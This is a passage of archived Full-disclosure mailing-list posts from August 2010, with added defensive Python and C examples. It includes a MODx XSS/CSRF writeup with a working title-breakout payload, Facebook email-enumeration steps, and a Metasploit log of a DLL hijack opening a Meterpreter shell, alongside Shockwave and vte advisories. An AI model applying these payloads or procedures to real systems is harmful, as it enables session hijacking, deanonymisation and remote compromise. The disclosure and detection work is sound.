After a bit of digging around (30 minutes) in the scripts, I found a simple
injection point in /manager/media/ImageEditor/editor.php.
<title>Image Editor - <?php echo $_GET['img']; ?></title>
Great!  However, protect.inc.php is included.  So script gets stripped.
That's alright, let's find another way to run our javascript.
</title></head><body onload=alert('hi');>
This is why blacklists fail.  Now all we need is a self-submitting form by
placing javascript inside onload.  Current Injection:

</title></head><body 
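The two checks the writeup bypasses, rebuilt in Python as an added example so the bypass conditions can be tested offline (this is not MODx code). referer_check_passes() mirrors the shape of the manager's Referer test quoted above; script_filter() mirrors only the <script> pattern from protect.inc.php, the remaining MODx tag patterns are left out; reflected_title() mirrors the editor.php reflection into <title>. SITE_URL stands in for MODX_SITE_URL and all inputs are constructed.

```python
"""Added example (not MODx code): the Referer check and the <script>
blacklist from the writeup, reproduced so their failure modes are visible."""
import re

SITE_URL = "http://www.victim.com/"   # assumption: stands in for MODX_SITE_URL


def referer_check_passes(referer, site_url=SITE_URL):
    """PHP shape:  if (!empty($referer)) { if (!preg_match('/^'.preg_quote(SITE,'/').'/i', $referer)) reject; }
    Two properties fall out of it: an absent/empty Referer skips the test
    entirely, and the match is a case-insensitive *prefix* match."""
    if referer in (None, "", "0"):        # PHP empty() is true for these
        return True                       # no Referer header: check never runs
    return re.match("^" + re.escape(site_url), referer, re.I) is not None


# '@<script[^>]*?>.*?</script>@si' from protect.inc.php, nothing else
SCRIPT_TAG = re.compile(r"<script[^>]*?>.*?</script>", re.S | re.I)


def script_filter(s):
    """What the blacklist removes: <script>...</script> blocks only."""
    return SCRIPT_TAG.sub("", s)


def reflected_title(img_param):
    """editor.php: <title>Image Editor - <?php echo $_GET['img']; ?></title>,
    after protect.inc.php has run over the parameter."""
    return "<title>Image Editor - %s</title>" % script_filter(img_param)


def breaks_out_of_title(html):
    """True when the reflected value closed <title> and opened an element
    carrying an event handler, i.e. the blacklist let live markup through."""
    return re.search(r"</title>.*<\w+[^>]*\bon\w+\s*=", html, re.S | re.I) is not None


if __name__ == "__main__":
    for ref in ("", "http://attacker.example/", "HTTP://WWW.VICTIM.COM/manager/"):
        print("referer %-32r -> %s" % (ref, "pass" if referer_check_passes(ref) else "reject"))
    for payload in ("<script>alert(1)</script>", "</title></head><body onload=alert('hi');>"):
        page = reflected_title(payload)
        print("%-45s -> breaks out: %s" % (payload, breaks_out_of_title(page)))
```

The first loop is the part of the writeup that matters for CSRF: the `!empty($referer)` guard means a request with no Referer at all is accepted, and browsers omit the header in ordinary situations (navigation from an HTTPS page to an HTTP one, a referrer policy set by the attacker's page, privacy extensions), so a Referer check of this shape is not a CSRF defence on its own; a per-session token verified on each state-changing request is. The second loop shows why stripping `<script>` does nothing against a payload that closes `<title>` and opens `<body onload=...>`, the blacklist failure the post points out.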

[Full-disclosure] Facebook Information Leakage ... Again

2010-08-24 Thread GulfTech Security Research
1. Navigate to the Facebook Friend Finder feature.

2.  Click the Upload Contact File option in order to access the file 
upload prompt.

3. Upload a contact file of ANY of the accepted formats that contains a 
list of email addresses that you would like to enumerate.

4. Select the target email(s), and click Invite to Join.

5. If the email you are targeting DOES have a restricted Facebook 
profile then an email invite will not be sent, and a page which contains 
a link to the Facebook profile associated with the target email address 
to be enumerated will be displayed, thus allowing you to link the email 
with the corresponding account.

Screens @ 
http://0x6a616d6573.blogspot.com/2010/08/facebook-information-leakage-again.html

~James



[Full-disclosure] t2'10 Challenge to be released 2010-08-28 10:00 EEST

2010-08-24 Thread Tomi Tuominen
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!

Now is your chance to join the past elites (http://t2.fi/challenge/) by
winning free admission to this year’s t2’10 Infosec Conference!

This year’s t2’10 Challenge is based on multi-staging (much like good
shell code), which will be powered by a scoreboard
(http://t2.fi/ext/scoreboard) so that you can see — (almost) in real
time — how the other participants are faring out there in the land of
the living.

The rules are simple: t2 will release the t2’10 Challenge and the first
one to solve it will win free admission to the t2’10 Infosec Conference.
But don’t stop just because you weren’t the first one to solve it: The
Advisory Board will select another winner among the next ten correct
answers, paying particular attention to the elegance of the solution
rather than the speed. In other words you can win with either speed or
style :)

The t2’10 Challenge will be released 2010-08-28 10:00 EEST at http://t2.fi/

Good luck,

- -- 
 Tomi 'T' Tuominen tomi.tuomi...@t2.fi
 Founder - t2 information security conference
 tel. +358 400 796 064 - fax. +358 401 796 064


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAkx0FCUACgkQlPoxKJv6bEpOTQCgqStiGRTGDpKUxI3ulFABU4B1
OQ4AoKnnRVWr2TqBTtj5Vk+6wSP72g1E
=7aR7
-END PGP SIGNATURE-


[Full-disclosure] DLL hijacking (Windows Address Book - wab32res.dll)

2010-08-24 Thread matt
For those interested, I just discovered that the Windows Address Book is
vulnerable to DLL hijacking when opening .vcf (and probably other) file
types.

http://www.attackvector.org/new-dll-hijacking-exploits-many/

[..snip..]
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll)
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue
Aug 24 13:49:02 -0500 2010
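The Metasploit log above is the attacker's view. As an added example (not from the post or the linked blog), here is the same access pattern seen from the share's side, with detection logic run over constructed WebDAV access-log lines: one client fetches a document and, moments later, looks up .dll/.exe names in the same directory, which is what a search-order hijack looks like to the server. Only the file names (owned.vcf, wab32res.dll, rundll32.exe) come from the post; the Apache-style log format, timestamps, the second client and the extension lists are assumptions.

```python
"""Added example, not from the post: flag clients that fetch a document from
a WebDAV share and then look up loadable modules next to it.  Log lines are
constructed; only the file names come from the post."""
import re
from datetime import datetime, timedelta

# Apache combined-style line; assumption: the WebDAV server logs this format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')
DOC_EXT = (".vcf", ".doc", ".xls", ".ppt", ".rtf", ".lnk")   # assumption: document types to watch
MOD_EXT = (".dll", ".exe", ".cpl", ".ocx")                   # assumption: loadable module types

SAMPLE_LOG = """\
10.0.0.252 - - [24/Aug/2010:13:48:55 -0500] "PROPFIND /hacku/ HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.252 - - [24/Aug/2010:13:48:57 -0500] "PROPFIND /hacku/wab32res.dll HTTP/1.1" 207 640 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.252 - - [24/Aug/2010:13:48:57 -0500] "GET /hacku/wab32res.dll HTTP/1.1" 200 9216 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.252 - - [24/Aug/2010:13:48:58 -0500] "PROPFIND /hacku/rundll32.exe HTTP/1.1" 404 219 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.252 - - [24/Aug/2010:13:48:59 -0500] "GET /hacku/owned.vcf HTTP/1.1" 200 310 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.77 - - [24/Aug/2010:13:50:10 -0500] "GET /docs/report.doc HTTP/1.1" 200 4096 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.77 - - [24/Aug/2010:14:20:00 -0500] "GET /tools/setup.exe HTTP/1.1" 200 100000 "-" "Mozilla/5.0"
"""


def parse(log_text):
    """Return (time, client, method, path, status) for each parseable line."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, ts, method, path, status = m.groups()
        events.append((datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
                       client, method, path, int(status)))
    return events


def detect_hijack_attempts(log_text, window=timedelta(seconds=30)):
    """(client, directory, document, module) for every client that touched a
    document and a module name in the same directory within `window`.
    Status codes are ignored on purpose: a 404 on rundll32.exe still shows
    the client walked its search path through the share."""
    by_dir = {}
    for when, client, method, path, status in parse(log_text):
        directory, _, name = path.rpartition("/")
        by_dir.setdefault((client, directory + "/"), []).append((when, name.lower()))
    hits = []
    for (client, directory), events in by_dir.items():
        docs = [(t, n) for t, n in events if n.endswith(DOC_EXT)]
        mods = [(t, n) for t, n in events if n.endswith(MOD_EXT)]
        for t_doc, doc in docs:
            for t_mod, mod in mods:
                hit = (client, directory, doc, mod)
                if abs(t_mod - t_doc) <= window and hit not in hits:
                    hits.append(hit)
    return hits


if __name__ == "__main__":
    for client, directory, doc, mod in detect_hijack_attempts(SAMPLE_LOG):
        print("%s opened %s%s and looked up %s next to it" % (client, directory, doc, mod))
```

The correlation is deliberately order-agnostic (the module lookup may be logged before or after the document fetch, as it is in the Metasploit output) and keyed on the directory rather than the file, since the search-order behaviour being abused is "look in the directory the document came from". The 10.0.0.77 client fetches a document and an executable from different directories and is not flagged.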

Re: [Full-disclosure] DLL hijacking (Windows Address Book - wab32res.dll)

2010-08-24 Thread Sherwyn
Thanks for the info, Matt, and nice blog by the way.
Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup


-Original Message-
From: matt m...@attackvector.org
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Tue, 24 Aug 2010 13:57:42 
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] DLL hijacking (Windows Address Book -
wab32res.dll)



[Full-disclosure] [ MDVSA-2010:161 ] vte

2010-08-24 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:161
 http://www.mandriva.com/security/
 ___

 Package : vte
 Date: August 24, 2010
 Affected: 2009.1, 2010.0, 2010.1
 ___

 Problem Description:

 A vulnerability has been found and corrected in vte:
 
 The vte_sequence_handler_window_manipulation function in vteseq.c
 in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in
 gnome-terminal, does not properly handle escape sequences, which
 allows remote attackers to execute arbitrary commands or obtain
 potentially sensitive information via a (1) window title or (2) icon
 title sequence.  NOTE: this issue exists because of a CVE-2003-0070
 regression (CVE-2010-2713).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2713
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
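An added example, not vte's code, of the mitigation a defender can apply on the sending side: a filter that strips the title-setting OSC sequences and the CSI window-manipulation sequences (final byte 't', the family handled by the function the advisory names) from untrusted text before it is written to a terminal, while leaving other CSI sequences such as colours intact. The sequence layouts follow the xterm control-sequence conventions; the inputs are constructed.

```c
/* Added example, not from vte or the advisory: remove the terminal
 * control sequences that set or report the window/icon title from text
 * of untrusted origin (a file being displayed, a remote log line). */
#include <stddef.h>
#include <string.h>

#define ESC 0x1b
#define BEL 0x07

/* Copies in[0..n) to out, omitting:
 *   - OSC sequences  ESC ] ... BEL  or  ESC ] ... ESC \   (title setting)
 *   - CSI sequences whose final byte is 't'              (window manipulation)
 * Other CSI sequences (colours, cursor moves) are kept verbatim.
 * out must hold at least n bytes. Returns the number of bytes written.
 * An unterminated sequence at the end of the input is dropped, not
 * passed through, so a truncated title sequence cannot leak out. */
size_t strip_title_sequences(const char *in, size_t n, char *out)
{
    size_t i = 0, o = 0;
    while (i < n) {
        if (in[i] != ESC || i + 1 >= n) {      /* ordinary byte (or lone trailing ESC) */
            out[o++] = in[i++];
            continue;
        }
        if (in[i + 1] == ']') {                /* OSC: skip to BEL or ESC \ */
            size_t j = i + 2;
            while (j < n) {
                if (in[j] == BEL) { j++; break; }
                if (in[j] == ESC && j + 1 < n && in[j + 1] == '\\') { j += 2; break; }
                j++;
            }
            i = j;                             /* j == n here means "unterminated": dropped */
            continue;
        }
        if (in[i + 1] == '[') {                /* CSI: parameter/intermediate bytes are 0x20..0x3f */
            size_t j = i + 2;
            while (j < n && ((unsigned char)in[j] < 0x40 || (unsigned char)in[j] > 0x7e))
                j++;
            if (j >= n) {                      /* no final byte: drop the fragment */
                i = n;
                break;
            }
            if (in[j] == 't') {                /* window manipulation (set/report title): drop */
                i = j + 1;
                continue;
            }
            memcpy(out + o, in + i, j + 1 - i); /* any other CSI: keep as-is */
            o += j + 1 - i;
            i = j + 1;
            continue;
        }
        out[o++] = in[i++];                    /* other ESC sequences pass through */
    }
    return o;
}
```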

[Full-disclosure] TPTI-10-10: Adobe Shockwave tSAC Chunk Invalid Seek Memory Corruption Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-10: Adobe Shockwave tSAC Chunk Invalid Seek Memory Corruption Remote 
Code Execution Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-10
August 24, 2010

-- CVE ID:
CVE-2010-2878

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within DIRAPIX.dll which is responsible for
parsing the Director movies, a RIFF-based file format. The code directly
uses a value from the file while seeking into a heap buffer. The process
then attempts to write a NULL byte to the seeked address. By specifying
a large enough value for this field, an attacker can force the process
to seek beyond the allocated bounds of the buffer. This can be leveraged
by an attacker to execute arbitrary code under the context of the user
running the web browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-08-11 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aaron Portnoy, Logan Brown, and Team lollersk8erz



[Full-disclosure] TPTI-10-12: Adobe Shockwave TextXtra Allocator Integer Overflow Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-12: Adobe Shockwave TextXtra Allocator Integer Overflow Remote Code 
Execution Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-12
August 24, 2010

-- CVE ID:
CVE-2010-2879

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists due to a faulty allocation routine within the
TextXtra.x32 module. This allocator allocates a buffer on the heap based
on arithmetic involving a number of elements and a size of an individual
element. As the fields come from the file, if either of them are large
enough, the value used for the number of bytes to allocate can be made
to overflow. As the return value is rarely checked any caller of this
function can usually be made to overflow the returned buffer with
user-supplied data. An attacker can leverage this to execute remote code
under the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-08-11 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aaron Portnoy, Logan Brown, and Team Montreal Hotties



[Full-disclosure] TPTI-10-11: Adobe Shockwave tSAC Chunk Pointer Offset Memory Corruption Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-11: Adobe Shockwave tSAC Chunk Pointer Offset Memory Corruption Remote 
Code Execution Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-11
August 24, 2010

-- CVE ID:
CVE-2010-2874 

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within DIRAPIX.dll which is responsible for
parsing the Director movies, a RIFF-based file format. The code
sign-extends a value from the input file and uses it as an offset to
seek into a heap buffer before performing a write operation. By crafting
particular values for this field, an attacker can force the process to
seek beyond the allocated bounds of the buffer. This can be leveraged by
an attacker to execute arbitrary code under the context of the user
running the web browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-08-11 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aaron Portnoy, Logan Brown, and Team lollersk8erz



[Full-disclosure] TPTI-10-09: Adobe Shockwave CSWV Chunk Memory Corruption Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-09: Adobe Shockwave CSWV Chunk Memory Corruption Remote Code Execution 
Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-09
August 24, 2010

-- CVE ID:
CVE-2010-2877

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within IML32X.dll and DIRAPIX.dll which are
responsible for parsing the Director movies, a RIFF-based file format.
The code trusts a value from the file as a count and performs an
endian-flipping loop on data in heap memory. If the value is large
enough the process can be made to seek outside the bounds of the
allocation and thus corrupt memory in a controlled fashion. This can be
leveraged by an attacker to execute arbitrary code under the context of
the user running the web browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-08-11 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aaron Portnoy, Logan Brown, and Team lollersk8erz



[Full-disclosure] TPTI-10-13: Adobe Shockwave Director tSAC Chunk Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-13: Adobe Shockwave Director tSAC Chunk Remote Code Execution 
Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-13
August 24, 2010

-- CVE ID:
CVE-2010-2866

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the code responsible for parsing
Director's RIFF-based file format. While parsing the tSAC chunk, the
DIRAPI module does not properly verify the signedness of a count value
within an undocumented structure. By providing a large enough negative
value a pointer can be miscalculated leading to memory corruption. This
can be exploited by a remote attacker to execute arbitrary code under
the context of the user running the web browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-05-27 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* TippingPoint FuzzBox as driven by Aaron Portnoy and Logan Brown



[Full-disclosure] TPTI-10-15: Adobe Shockwave Director mmap Trusted Chunk Size Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-15: Adobe Shockwave Director mmap Trusted Chunk Size Remote Code 
Execution Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-15
August 24, 2010

-- CVE ID:
CVE-2010-2870

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the DIRAPIX module responsible for
parsing the RIFF-based Director file format. When handling the mmap
chunk, the process trusts the chunk size immediately following the
fourCC value. It is passed to Ordinal exported by the IML32X module
which is responsible for allocating a heap buffer for processing the
rest of the chunk. If an incorrect size is provided, later memory copies
can corrupt data beyond the allocated buffer. This can be abused to
execute remote code under the context of the user running the web
browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-05-27 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* TippingPoint FuzzBox as driven by Aaron Portnoy and Logan Brown



[Full-disclosure] TPTI-10-14: Adobe Shockwave Director rcsL Chunk Pointer Offset Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
TPTI-10-14: Adobe Shockwave Director rcsL Chunk Pointer Offset Remote Code 
Execution Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-14
August 24, 2010

-- CVE ID:
CVE-2010-2867

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the code responsible for parsing the
Director RIFF based file format. While handling the rcsL chunk, code
within DIRAPIX sign-extends a return value from a call to Ordinal1412
within the IML32X module. This ordinal is responsible for unmarshalling
a WORD value from the RIFF chunk. If the value is signed, DIRAPIX
sign-extends the value, performs arithmetic on it, and then proceeds to
use it as an offset into a heap-based buffer. By supplying any of a
specific range of values, an attacker can exploit this condition to
execute arbitrary code under the context of the user running the web
browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-05-27 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* TippingPoint FuzzBox as driven by Aaron Portnoy and Logan Brown



[Full-disclosure] ZDI-10-160: Adobe Shockwave Player Director File FFFFFF45 Record Processing Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
ZDI-10-160: Adobe Shockwave Player Director File FF45 Record Processing 
Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-160
August 24, 2010

-- CVE ID:
CVE-2010-2871

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10286. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the application's support for 3D
objects. While parsing the 0xFF45 RIFF record type, the process
performs arithmetic on a size value and uses the result for a heap-based
allocation. By specifying a large enough value an attacker can force the
integer to wrap and thus the process will under-allocate the buffer.
This memory is later copied into using a different size value which
results in object corruption that can be leveraged to execute arbitrary
code under the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-10-161: Adobe Shockwave Director PAMI Chunk Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
ZDI-10-161: Adobe Shockwave Director PAMI Chunk Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-161
August 24, 2010

-- CVE ID:
CVE-2010-2872

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9969. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the code responsible for parsing
Director files. When the application parses the pami RIFF chunk, it
trusts an offset value and seeks into the file data. If provided with
signed values in the data at the given offset, the process can be made
to incorrectly calculate a pointer and operate on the data at its
location. This can be abused by an attacker to execute arbitrary code
under the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put




[Full-disclosure] ZDI-10-162: Adobe Shockwave Director rcsL Chunk Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
ZDI-10-162: Adobe Shockwave Director rcsL Chunk Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-162
August 24, 2010

-- CVE ID:
CVE-2010-2873

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the parsing of the rcsL RIFF chunk
within director files of extension DIR or DCR. While parsing this
undocumented structure, the application blindly trusts an offset value
and uses it while operating on heap memory. An attacker can abuse this
to corrupt a function pointer which can lead to arbitrary code execution
under the context of the user running the web browser. 

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put


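Added C example, not Adobe's code or the advisories', for the two parser checks the Director chunk handlers in TPTI-10-11, TPTI-10-14, TPTI-10-15, ZDI-10-161 and ZDI-10-162 are described as lacking: a RIFF chunk walker that bounds the declared chunk size against the bytes that remain, and an offset read shown both sign-extended (the flawed form) and unsigned with a bounds check. The chunk layout is standard RIFF; the 16-bit offset field at payload byte 0 and the scale factor of 4 are assumptions standing in for the undocumented rcsL/pami/tSAC fields.

```c
/* Added example, not from Adobe or the advisories: bounded RIFF chunk
 * walking and an unsigned, bounds-checked offset read. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    char           id[5];     /* fourCC, NUL-terminated */
    uint32_t       size;      /* declared payload size, already bounds-checked */
    const uint8_t *payload;   /* points into the caller's buffer */
} chunk_t;

static uint32_t rd_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd_u16le(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Read the chunk starting at *pos and advance *pos past it. Fails when the
 * 8-byte header is truncated or the declared size exceeds the bytes that
 * remain: the check the mmap handler of TPTI-10-15 is described as missing. */
bool riff_next_chunk(const uint8_t *buf, size_t len, size_t *pos, chunk_t *out)
{
    if (*pos > len || len - *pos < 8)
        return false;
    uint32_t size = rd_u32le(buf + *pos + 4);
    if (size > len - *pos - 8)
        return false;                       /* payload would run past the buffer */
    memcpy(out->id, buf + *pos, 4);
    out->id[4] = '\0';
    out->size = size;
    out->payload = buf + *pos + 8;
    *pos += 8 + size + (size & 1);          /* RIFF pads odd-sized chunks */
    return true;
}

/* The flawed read: a 16-bit field taken into a signed type is negative for
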